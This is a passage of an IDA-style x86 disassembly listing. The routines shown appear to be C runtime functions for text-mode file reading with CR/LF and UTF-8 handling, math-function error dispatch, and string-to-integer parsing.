mov [ebp+arg_8], ecx
jmp loc_40A0AD
; ---------------------------------------------------------------------------
loc_40A01D: ; CODE XREF: sub_409DAD+262�j
mov eax, [ebp+var_10]
dec eax
cmp ecx, eax
jnb short loc_40A03C
lea eax, [ecx+1]
cmp byte ptr [eax], 0Ah
jnz short loc_40A037
inc ecx
inc ecx
mov [ebp+arg_8], ecx
loc_40A032: ; CODE XREF: sub_409DAD+2CA�j
; sub_409DAD+2E3�j
mov byte ptr [edi], 0Ah
jmp short loc_40A0AC
; ---------------------------------------------------------------------------
loc_40A037: ; CODE XREF: sub_409DAD+27E�j
mov [ebp+arg_8], eax
jmp short loc_40A0A9
; ---------------------------------------------------------------------------
loc_40A03C: ; CODE XREF: sub_409DAD+276�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_18]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jnz short loc_40A064
call ds:dword_41D0F0
test eax, eax
jnz short loc_40A0A9
loc_40A064: ; CODE XREF: sub_409DAD+2AB�j
cmp [ebp+var_18], 0
jz short loc_40A0A9
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A087
cmp [ebp+var_1], 0Ah
jz short loc_40A032
mov byte ptr [edi], 0Dh
mov eax, [ebx]
mov cl, [ebp+var_1]
mov [esi+eax+5], cl
jmp short loc_40A0AC
; ---------------------------------------------------------------------------
loc_40A087: ; CODE XREF: sub_409DAD+2C4�j
cmp edi, [ebp+var_C]
jnz short loc_40A092
cmp [ebp+var_1], 0Ah
jz short loc_40A032
loc_40A092: ; CODE XREF: sub_409DAD+2DD�j
push 1
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
cmp [ebp+var_1], 0Ah
jz short loc_40A0AD
loc_40A0A9: ; CODE XREF: sub_409DAD+28D�j
; sub_409DAD+2B5�j ...
mov byte ptr [edi], 0Dh
loc_40A0AC: ; CODE XREF: sub_409DAD+288�j
; sub_409DAD+2D8�j
inc edi
loc_40A0AD: ; CODE XREF: sub_409DAD+26B�j
; sub_409DAD+2FA�j
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A000
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
loc_40A0BB: ; CODE XREF: sub_409DAD+25A�j
mov eax, [ebx]
lea eax, [esi+eax+4]
test byte ptr [eax], 40h
jnz short loc_40A0CB
or byte ptr [eax], 2
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
loc_40A0CB: ; CODE XREF: sub_409DAD+317�j
mov al, [ecx]
mov [edi], al
inc edi
loc_40A0D0: ; CODE XREF: sub_409DAD+24D�j
; sub_409DAD+30C�j ...
mov eax, edi
sub eax, [ebp+var_C]
cmp [ebp+var_2], 1
mov [ebp+var_10], eax
jnz loc_40A1B2
test eax, eax
jz loc_40A1B2
dec edi
mov cl, [edi]
test cl, cl
js short loc_40A0F7
inc edi
jmp loc_40A17D
; ---------------------------------------------------------------------------
loc_40A0F7: ; CODE XREF: sub_409DAD+342�j
xor eax, eax
inc eax
movzx ecx, cl
jmp short loc_40A10E
; ---------------------------------------------------------------------------
loc_40A0FF: ; CODE XREF: sub_409DAD+368�j
cmp eax, 4
jg short loc_40A117
cmp edi, [ebp+var_C]
jb short loc_40A117
dec edi
movzx ecx, byte ptr [edi]
inc eax
loc_40A10E: ; CODE XREF: sub_409DAD+350�j
cmp ds:byte_423CB8[ecx], 0
jz short loc_40A0FF
loc_40A117: ; CODE XREF: sub_409DAD+355�j
; sub_409DAD+35A�j
mov dl, [edi]
movzx ecx, dl
movsx ecx, ds:byte_423CB8[ecx]
test ecx, ecx
jnz short loc_40A134
call sub_4057D3
mov dword ptr [eax], 2Ah
jmp short loc_40A1AE
; ---------------------------------------------------------------------------
loc_40A134: ; CODE XREF: sub_409DAD+378�j
inc ecx
cmp ecx, eax
jnz short loc_40A13D
add edi, eax
jmp short loc_40A17D
; ---------------------------------------------------------------------------
loc_40A13D: ; CODE XREF: sub_409DAD+38A�j
mov ecx, [ebx]
add ecx, esi
test byte ptr [ecx+4], 48h
jz short loc_40A16B
inc edi
cmp eax, 2
mov [ecx+5], dl
jl short loc_40A159
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+25h], dl
inc edi
loc_40A159: ; CODE XREF: sub_409DAD+3A1�j
cmp eax, 3
jnz short loc_40A167
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+26h], dl
inc edi
loc_40A167: ; CODE XREF: sub_409DAD+3AF�j
sub edi, eax
jmp short loc_40A17D
; ---------------------------------------------------------------------------
loc_40A16B: ; CODE XREF: sub_409DAD+398�j
neg eax
cdq
push 1
push edx
push eax
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
loc_40A17D: ; CODE XREF: sub_409DAD+345�j
; sub_409DAD+38E�j ...
mov eax, [ebp+var_1C]
sub edi, [ebp+var_C]
shr eax, 1
push eax
push [ebp+arg_4]
push edi
push [ebp+var_C]
push 0
push 0FDE9h
call ds:dword_41D0A0
test eax, eax
mov [ebp+var_10], eax
jnz short loc_40A1D5
call ds:dword_41D0F0
loc_40A1A7: ; CODE XREF: sub_409DAD+58C�j
push eax
call sub_4057F9
pop ecx
loc_40A1AE: ; CODE XREF: sub_409DAD+385�j
; sub_409DAD+584�j
or [ebp+var_14], 0FFFFFFFFh
loc_40A1B2: ; CODE XREF: sub_409DAD+1AD�j
; sub_409DAD+32F�j ...
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jz short loc_40A1C1
push eax
call sub_403603
pop ecx
loc_40A1C1: ; CODE XREF: sub_409DAD+40B�j
mov eax, [ebp+var_14]
cmp eax, 0FFFFFFFEh
jnz loc_40A34A
mov eax, [ebp+var_10]
jmp loc_40A34A
; ---------------------------------------------------------------------------
loc_40A1D5: ; CODE XREF: sub_409DAD+3F2�j
add eax, eax
mov [ebp+var_10], eax
jmp short loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A1DC: ; CODE XREF: sub_409DAD+1B7�j
test edi, edi
jz short loc_40A1EE
mov ecx, [ebp+var_C]
cmp word ptr [ecx], 0Ah
jnz short loc_40A1EE
or byte ptr [eax], 4
jmp short loc_40A1F1
; ---------------------------------------------------------------------------
loc_40A1EE: ; CODE XREF: sub_409DAD+431�j
; sub_409DAD+43A�j
and byte ptr [eax], 0FBh
loc_40A1F1: ; CODE XREF: sub_409DAD+43F�j
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A307
loc_40A207: ; CODE XREF: sub_409DAD+53A�j
mov eax, [ebp+arg_8]
movzx ecx, word ptr [eax]
cmp cx, 1Ah
jz loc_40A2EF
cmp cx, 0Dh
jz short loc_40A22C
mov [edi], cx
inc edi
inc edi
inc eax
inc eax
mov [ebp+arg_8], eax
jmp loc_40A2E1
; ---------------------------------------------------------------------------
loc_40A22C: ; CODE XREF: sub_409DAD+46E�j
mov ecx, [ebp+var_10]
add ecx, 0FFFFFFFEh
cmp eax, ecx
jnb short loc_40A257
lea ecx, [eax+2]
cmp word ptr [ecx], 0Ah
jnz short loc_40A24F
add eax, 4
mov [ebp+arg_8], eax
loc_40A245: ; CODE XREF: sub_409DAD+4E7�j
; sub_409DAD+513�j
mov word ptr [edi], 0Ah
jmp loc_40A2DF
; ---------------------------------------------------------------------------
loc_40A24F: ; CODE XREF: sub_409DAD+490�j
mov [ebp+arg_8], ecx
jmp loc_40A2DA
; ---------------------------------------------------------------------------
loc_40A257: ; CODE XREF: sub_409DAD+487�j
add [ebp+arg_8], 2
push 0
lea eax, [ebp+var_18]
push eax
push 2
lea eax, [ebp+var_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jnz short loc_40A280
call ds:dword_41D0F0
test eax, eax
jnz short loc_40A2DA
loc_40A280: ; CODE XREF: sub_409DAD+4C7�j
cmp [ebp+var_18], 0
jz short loc_40A2DA
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A2B6
cmp [ebp+var_8], 0Ah
jz short loc_40A245
mov word ptr [edi], 0Dh
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8]
mov [esi+eax+5], cl
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8+1]
mov [esi+eax+25h], cl
mov eax, [ebx]
mov byte ptr [esi+eax+26h], 0Ah
jmp short loc_40A2DF
; ---------------------------------------------------------------------------
loc_40A2B6: ; CODE XREF: sub_409DAD+4E0�j
cmp edi, [ebp+var_C]
jnz short loc_40A2C2
cmp [ebp+var_8], 0Ah
jz short loc_40A245
loc_40A2C2: ; CODE XREF: sub_409DAD+50C�j
push 1
push 0FFFFFFFFh
push 0FFFFFFFEh
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
cmp [ebp+var_8], 0Ah
jz short loc_40A2E1
loc_40A2DA: ; CODE XREF: sub_409DAD+4A5�j
; sub_409DAD+4D1�j ...
mov word ptr [edi], 0Dh
loc_40A2DF: ; CODE XREF: sub_409DAD+49D�j
; sub_409DAD+507�j
inc edi
inc edi
loc_40A2E1: ; CODE XREF: sub_409DAD+47A�j
; sub_409DAD+52B�j
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A207
jmp short loc_40A307
; ---------------------------------------------------------------------------
loc_40A2EF: ; CODE XREF: sub_409DAD+464�j
mov ecx, [ebx]
lea esi, [esi+ecx+4]
test byte ptr [esi], 40h
jnz short loc_40A2FF
or byte ptr [esi], 2
jmp short loc_40A307
; ---------------------------------------------------------------------------
loc_40A2FF: ; CODE XREF: sub_409DAD+54B�j
mov ax, [eax]
mov [edi], ax
inc edi
inc edi
loc_40A307: ; CODE XREF: sub_409DAD+454�j
; sub_409DAD+540�j ...
sub edi, [ebp+var_C]
mov [ebp+var_10], edi
jmp loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A312: ; CODE XREF: sub_409DAD+187�j
; sub_409DAD+192�j ...
call ds:dword_41D0F0
push 5
pop esi
cmp eax, esi
jnz short loc_40A336
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], esi
jmp loc_40A1AE
; ---------------------------------------------------------------------------
loc_40A336: ; CODE XREF: sub_409DAD+570�j
cmp eax, 6Dh
jnz loc_40A1A7
and [ebp+var_14], 0
jmp loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A348: ; CODE XREF: sub_409DAD+A6�j
; sub_409DAD+AF�j
xor eax, eax
loc_40A34A: ; CODE XREF: sub_409DAD+235�j
; sub_409DAD+41A�j ...
pop ebx
loc_40A34B: ; CODE XREF: sub_409DAD+66�j
pop edi
loc_40A34C: ; CODE XREF: sub_409DAD+30�j
pop esi
leave
retn
sub_409DAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A34F proc near ; CODE XREF: sub_403B22+C9�p
; sub_409C8D+73�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4215C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40A37E
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40A376: ; CODE XREF: sub_40A34F+5C�j
or eax, 0FFFFFFFFh
jmp loc_40A41B
; ---------------------------------------------------------------------------
loc_40A37E: ; CODE XREF: sub_40A34F+12�j
xor edi, edi
cmp eax, edi
jl short loc_40A38C
cmp eax, ds:dword_433C84
jb short loc_40A3AD
loc_40A38C: ; CODE XREF: sub_40A34F+33�j
; sub_40A34F+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40A376
; ---------------------------------------------------------------------------
loc_40A3AD: ; CODE XREF: sub_40A34F+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40A38C
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40A3F6
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409DAD
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40A40C
; ---------------------------------------------------------------------------
loc_40A3F6: ; CODE XREF: sub_40A34F+8F�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40A40C: ; CODE XREF: sub_40A34F+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40A421
mov eax, [ebp+var_1C]
loc_40A41B: ; CODE XREF: sub_40A34F+2A�j
call __SEH_epilog4
retn
sub_40A34F endp
; =============== S U B R O U T I N E =======================================
sub_40A421 proc near ; CODE XREF: sub_40A34F+C4�p
; DATA XREF: seg001:004215D8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40A421 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A42B proc near ; CODE XREF: sub_403DA0+B5�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
xor eax, eax
cmp ds:dword_4262F0, eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_0]
mov byte ptr [ebp+var_8], al
mov byte ptr [ebp+var_8+1], al
mov byte ptr [ebp+var_8+2], al
mov byte ptr [ebp+var_8+3], al
mov byte ptr [ebp+var_8+4], al
mov byte ptr [ebp+var_8+5], al
mov byte ptr [ebp+var_8+6], al
mov byte ptr [ebp+var_8+7], al
jz short loc_40A46D
push ds:dword_433C80
call sub_405193
pop ecx
jmp short loc_40A472
; ---------------------------------------------------------------------------
loc_40A46D: ; CODE XREF: sub_40A42B+32�j
mov eax, offset sub_40F708
loc_40A472: ; CODE XREF: sub_40A42B+40�j
mov ecx, [ebp+arg_C]
mov edx, 0A6h
cmp ecx, edx
jg loc_40A5F6
jz loc_40A5E3
cmp ecx, 19h
jg loc_40A589
jz loc_40A580
mov edx, ecx
push 2
pop ecx
sub edx, ecx
jz loc_40A571
dec edx
jz loc_40A568
sub edx, 5
jz loc_40A559
dec edx
jz loc_40A541
sub edx, 5
jz short loc_40A531
dec edx
jz short loc_40A508
sub edx, 9
jnz loc_40A6A0 ; default
mov [ebp+var_28], 3
loc_40A4D3: ; CODE XREF: sub_40A42B+1AC�j
mov [ebp+var_24], offset aPow ; "pow"
loc_40A4DA: ; CODE XREF: sub_40A42B+114�j
; sub_40A42B+138�j ...
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
test eax, eax
pop ecx
jnz loc_40A69B
call sub_4057D3
mov dword ptr [eax], 22h
jmp loc_40A69B
; ---------------------------------------------------------------------------
loc_40A508: ; CODE XREF: sub_40A42B+96�j
mov [ebp+var_24], offset aExp ; "exp"
loc_40A50F: ; CODE XREF: sub_40A42B+15C�j
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
mov [ebp+var_28], 4
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
pop ecx
jmp loc_40A69B
; ---------------------------------------------------------------------------
loc_40A531: ; CODE XREF: sub_40A42B+93�j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp ; "exp"
jmp short loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A541: ; CODE XREF: sub_40A42B+8A�j
mov [ebp+var_24], offset aLog10 ; "log10"
loc_40A548: ; CODE XREF: sub_40A42B+144�j
; sub_40A42B+181�j ...
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
jmp loc_40A67B
; ---------------------------------------------------------------------------
loc_40A559: ; CODE XREF: sub_40A42B+83�j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog10 ; "log10"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A568: ; CODE XREF: sub_40A42B+7A�j
mov [ebp+var_24], offset aLog ; "log"
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A571: ; CODE XREF: sub_40A42B+73�j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog ; "log"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A580: ; CODE XREF: sub_40A42B+66�j
mov [ebp+var_24], offset aPow ; "pow"
jmp short loc_40A50F
; ---------------------------------------------------------------------------
loc_40A589: ; CODE XREF: sub_40A42B+60�j
sub ecx, 1Ah
jz short loc_40A5DC
dec ecx
jz short loc_40A5D0
dec ecx
jz short loc_40A5C4 ; jumptable 0040A605 case 1006
dec ecx
jz short loc_40A5B7
sub ecx, 1Dh
jz short loc_40A5AE ; jumptable 0040A605 case 1008
sub ecx, 3
jnz loc_40A6A0 ; default
loc_40A5A5: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset aAsin ; jumptable 0040A605 case 1009
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5AE: ; CODE XREF: sub_40A42B+16F�j
; sub_40A42B+1DA�j
; DATA XREF: ...
mov [ebp+var_24], offset aAcos ; jumptable 0040A605 case 1008
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5B7: ; CODE XREF: sub_40A42B+16A�j
mov [ebp+var_24], offset aPow ; "pow"
loc_40A5BE: ; CODE XREF: sub_40A42B+1E8�j
; sub_40A42B+1F1�j ...
fld qword ptr [edi]
fstp qword ptr [esi]
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5C4: ; CODE XREF: sub_40A42B+167�j
; sub_40A42B+1DA�j
; DATA XREF: ...
mov [ebp+var_24], offset aPow ; jumptable 0040A605 case 1006
jmp loc_40A548
; ---------------------------------------------------------------------------
loc_40A5D0: ; CODE XREF: sub_40A42B+164�j
mov [ebp+var_28], 2
jmp loc_40A4D3
; ---------------------------------------------------------------------------
loc_40A5DC: ; CODE XREF: sub_40A42B+161�j
fld1
jmp loc_40A69E
; ---------------------------------------------------------------------------
loc_40A5E3: ; CODE XREF: sub_40A42B+57�j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp10 ; "exp10"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A5F6: ; CODE XREF: sub_40A42B+51�j
add ecx, 0FFFFFC18h ; switch 13 cases
cmp ecx, 0Ch
ja loc_40A6A0 ; default
jmp off_40A6A7[ecx*4] ; switch jump
loc_40A60C: ; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset aLog ; jumptable 0040A605 case 1000
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A615: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset aLog10 ; jumptable 0040A605 case 1001
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A61E: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset aExp ; jumptable 0040A605 case 1002
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A627: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset aAtan ; jumptable 0040A605 case 1003
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A630: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset aCeil ; jumptable 0040A605 case 1004
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A639: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset aFloor ; jumptable 0040A605 case 1005
jmp loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A645: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset aModf ; jumptable 0040A605 case 1007
jmp loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A651: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBC0 ; jumptable 0040A605 case 1010
jmp short loc_40A66A
; ---------------------------------------------------------------------------
loc_40A65A: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBBC ; jumptable 0040A605 case 1011
jmp short loc_40A66A
; ---------------------------------------------------------------------------
loc_40A663: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: seg000:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBB8 ; jumptable 0040A605 case 1012
loc_40A66A: ; CODE XREF: sub_40A42B+22D�j
; sub_40A42B+236�j
fld qword ptr [edi]
fmul [ebp+var_8]
fst qword ptr [esi]
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
loc_40A67B: ; CODE XREF: sub_40A42B+129�j
lea ecx, [ebp+var_28]
fstp [ebp+var_10]
push ecx
mov [ebp+var_28], 1
call eax
test eax, eax
pop ecx
jnz short loc_40A69B
call sub_4057D3
mov dword ptr [eax], 21h
loc_40A69B: ; CODE XREF: sub_40A42B+C7�j
; sub_40A42B+D8�j ...
fld [ebp+var_10]
loc_40A69E: ; CODE XREF: sub_40A42B+1B3�j
fstp qword ptr [esi]
loc_40A6A0: ; CODE XREF: sub_40A42B+9B�j
; sub_40A42B+174�j ...
pop edi ; default
pop esi
pop ebx
leave
retn
sub_40A42B endp
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
off_40A6A7 dd offset loc_40A60C ; DATA XREF: sub_40A42B+1DA�r
dd offset loc_40A615 ; jump table for switch statement
dd offset loc_40A61E
dd offset loc_40A627
dd offset loc_40A630
dd offset loc_40A639
dd offset loc_40A5C4
dd offset loc_40A645
dd offset loc_40A5AE
dd offset loc_40A5A5
dd offset loc_40A651
dd offset loc_40A65A
dd offset loc_40A663
; =============== S U B R O U T I N E =======================================
sub_40A6DB proc near ; DATA XREF: seg001:0041D2CC�o
and ds:dword_433C78, 0
call sub_40F7D9
mov ds:dword_433C78, eax
xor eax, eax
retn
sub_40A6DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40A6EF(double)
sub_40A6EF proc near ; CODE XREF: sub_403DA0+7�j
; sub_403DA0+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_423DB8
call sub_41005D
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_40A775
call sub_40FF3C
test eax, eax
pop ecx
pop ecx
jle short loc_40A758
cmp eax, 2
jle short loc_40A74A
cmp eax, 3
jnz short loc_40A758
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_40FDF4
add esp, 10h
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A74A: ; CODE XREF: sub_40A6EF+3F�j
push esi
push ebx
call sub_41005D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A758: ; CODE XREF: sub_40A6EF+3A�j
; sub_40A6EF+44�j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_41DBF0
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_40A7B4
; ---------------------------------------------------------------------------
loc_40A775: ; CODE XREF: sub_40A6EF+2F�j
call sub_40FF01
fstp [ebp+var_8]
fld [ebp+arg_0]
pop ecx
fcomp [ebp+var_8]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_40A79A
loc_40A78C: ; CODE XREF: sub_40A6EF+AE�j
push esi
push ebx
call sub_41005D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A79A: ; CODE XREF: sub_40A6EF+9B�j
test bl, 20h
jnz short loc_40A78C
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_40A7B4: ; CODE XREF: sub_40A6EF+84�j
call sub_40FE47
add esp, 1Ch
loc_40A7BC: ; CODE XREF: sub_40A6EF+59�j
; sub_40A6EF+67�j ...
pop esi
pop ebx
leave
retn
sub_40A6EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7C0 proc near ; CODE XREF: sub_40A9EB:loc_40AA0A�p
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
push [ebp+arg_0]
lea ecx, [ebp+var_14]
call sub_40271F
mov eax, [ebp+arg_8]
mov esi, [ebp+arg_4]
xor edi, edi
cmp eax, edi
jz short loc_40A7E1
mov [eax], esi
loc_40A7E1: ; CODE XREF: sub_40A7C0+1D�j
cmp esi, edi
jnz short loc_40A811
loc_40A7E5: ; CODE XREF: sub_40A7C0+5A�j
; sub_40A7C0+60�j
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40A80A
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A80A: ; CODE XREF: sub_40A7C0+41�j
xor eax, eax
jmp loc_40A9E7
; ---------------------------------------------------------------------------
loc_40A811: ; CODE XREF: sub_40A7C0+23�j
cmp [ebp+arg_C], edi
jz short loc_40A822
cmp [ebp+arg_C], 2
jl short loc_40A7E5
cmp [ebp+arg_C], 24h
jg short loc_40A7E5
loc_40A822: ; CODE XREF: sub_40A7C0+54�j
mov ecx, [ebp+var_14]
push ebx
mov bl, [esi]
mov [ebp+var_4], edi
lea edi, [esi+1]
loc_40A82E: ; CODE XREF: sub_40A7C0+A5�j
cmp dword ptr [ecx+0ACh], 1
jle short loc_40A84E
lea eax, [ebp+var_14]
push eax
movzx eax, bl
push 8
push eax
call sub_40CA44
mov ecx, [ebp+var_14]
add esp, 0Ch
jmp short loc_40A85E
; ---------------------------------------------------------------------------
loc_40A84E: ; CODE XREF: sub_40A7C0+75�j
mov edx, [ecx+0C8h]
movzx eax, bl
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_40A85E: ; CODE XREF: sub_40A7C0+8C�j
test eax, eax
jz short loc_40A867
mov bl, [edi]
inc edi
jmp short loc_40A82E
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A7C0+A0�j
cmp bl, 2Dh
jnz short loc_40A872
or [ebp+arg_10], 2
jmp short loc_40A877
; ---------------------------------------------------------------------------
loc_40A872: ; CODE XREF: sub_40A7C0+AA�j
cmp bl, 2Bh
jnz short loc_40A87A
loc_40A877: ; CODE XREF: sub_40A7C0+B0�j
mov bl, [edi]
inc edi
loc_40A87A: ; CODE XREF: sub_40A7C0+B5�j
mov eax, [ebp+arg_C]
test eax, eax
jl loc_40A9CE
cmp eax, 1
jz loc_40A9CE
cmp eax, 24h
jg loc_40A9CE
test eax, eax
jnz short loc_40A8C5
cmp bl, 30h
jz short loc_40A8A9
mov [ebp+arg_C], 0Ah
jmp short loc_40A8DD
; ---------------------------------------------------------------------------
loc_40A8A9: ; CODE XREF: sub_40A7C0+DE�j
mov al, [edi]
cmp al, 78h
jz short loc_40A8BC
cmp al, 58h
jz short loc_40A8BC
mov [ebp+arg_C], 8
jmp short loc_40A8DD
; ---------------------------------------------------------------------------
loc_40A8BC: ; CODE XREF: sub_40A7C0+ED�j
; sub_40A7C0+F1�j
mov [ebp+arg_C], 10h
jmp short loc_40A8CF
; ---------------------------------------------------------------------------
loc_40A8C5: ; CODE XREF: sub_40A7C0+D9�j
cmp eax, 10h
jnz short loc_40A8DD
cmp bl, 30h
jnz short loc_40A8DD
loc_40A8CF: ; CODE XREF: sub_40A7C0+103�j
mov al, [edi]
cmp al, 78h
jz short loc_40A8D9
cmp al, 58h
jnz short loc_40A8DD
loc_40A8D9: ; CODE XREF: sub_40A7C0+113�j
inc edi
mov bl, [edi]
inc edi
loc_40A8DD: ; CODE XREF: sub_40A7C0+E7�j
; sub_40A7C0+FA�j ...
mov esi, [ecx+0C8h]
or eax, 0FFFFFFFFh
xor edx, edx
